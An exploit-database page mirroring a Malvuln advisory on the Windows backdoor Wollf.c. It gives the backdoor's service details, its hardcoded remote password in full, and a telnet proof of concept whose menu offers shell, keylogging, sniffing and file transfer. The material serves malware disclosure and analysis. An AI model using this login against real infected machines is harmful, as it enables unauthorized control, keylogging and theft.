Advertisement






Backdoor.Win32.Wollf.c / Hardcoded Backdoor Password

CVE Category Price Severity
CWE-798 Not specified Critical
Author Risk Exploitation Type Date
Not specified High Local 2021-01-27
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010177

Below is a copy:

Backdoor.Win32.Wollf.c / Hardcoded Backdoor Password
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/91c02a95839a76a5d2e335cded7112a9.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Wollf.c
Vulnerability: Hardcoded Backdoor Password
Description: The backdoor creates a service "sysocm.exe" running with SYSTEM integrity. The sysocm service listens for commands on TCP port 7754. The backdoors remote logon password is "mDVs3TAv8sByKyG6YgwbtYQK6fSQeauz" and while strong, its stored in the executable and easily discovered using strings utility.

C:\>sc qc sysocm
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: sysocm
        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\system32\sysocm.exe -start
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : sysocm
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Type: PE32
MD5: 91c02a95839a76a5d2e335cded7112a9
Vuln ID: MVID-2021-0053
Dropped files: sysocm.exe
Disclosure: 01/25/2021

Exploit/PoC:
TELNET [BACKDOORED_HOST_IP] 7754

login: mDVs3TAv8sByKyG6YgwbtYQK6fSQeauz

Login succeed!

"Wollf Remote Manager" v1.6                                                                                            
Code by wollf, http://www.xfocus.org
                                                                                                                                                                                                          
[DESKTOP-BLAHX@C:\WINDOWS\system32]# 

DOS                  Switch to MS-DOS prompt                                                                            
DIR/LS/LIST          Directory and file list                                                                            
CD                   Entry directory                                                                                    
MD/MKDIR             Make directory                                                                                     
PWD                  Get current dirctory                                                                               
COPY/CP              Copy file                                                                                          
DEL/RM               Delete directory/file                                                                              
REN/RENAME           Rename file                                                                                        
MOVE/MV              Move file                                                                                          
TYPE/CAT             Type text file                                                                                                                                                                                                             POPMSG               Popup message box                                                                                  
SYSINFO              Get system information                                                                             
WHO/W                Get current connections                                                                                                                                                                                                    SHELL                Execute command by system shell(cmd.exe)                                                           
EXEC/RUN             Execute file by windows API(WinExec)                                                               
WS                   Windows list                                                                                       
PS                   Process list                                                                                       
KILL                 Kill process                                                                                                                                                                                                               GET/GETFILE          Download file from remote machine                                                                  
PUT/PUTFILE          Upload file to remote machine                                                                      
WGET                 Get file from web server                                                                           
FGET                 Get file from ftp server                                                                           
FPUT                 Put file to ftp server                                                                             
TELNET               Connect to other host                                                                                                                                                                                                      FTPD                 Start ftp service                                                                                  
TELNETD/TELD/EXPORT  Start telnet service (export shell)                                                                                                                                                                                        
REDIR                Redirect tcp data from <Port> to <Dest_host:Dest_port>                                             
REDIR_STOP           Stop redirect tcp data                                                                             
SNIFF                Sniff ftp/smtp/pop3/http password what via ethernet                                                
SNIFF_STOP           Stop ethernet sniffer                                                                              
KEYLOG               Start keyboard record                                                                              
KEYLOG_STOP          Stop keyboard record                                                                                                                                                                                                       REBOOT               Reboot windows                                                                                     
SHUTDOWN             Shutdown windows                                                                                   
EXIT                 Close current connection                                                                           
QUIT                 Close all connection and abort service                                                             
REMOVE               Remove service                                                                                     
VER/VERSION          Version information                                                                                
HELP/H/?             Show help message                                                                                                                                                                                                          Type "HELP | MORE" for multipage display.  

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum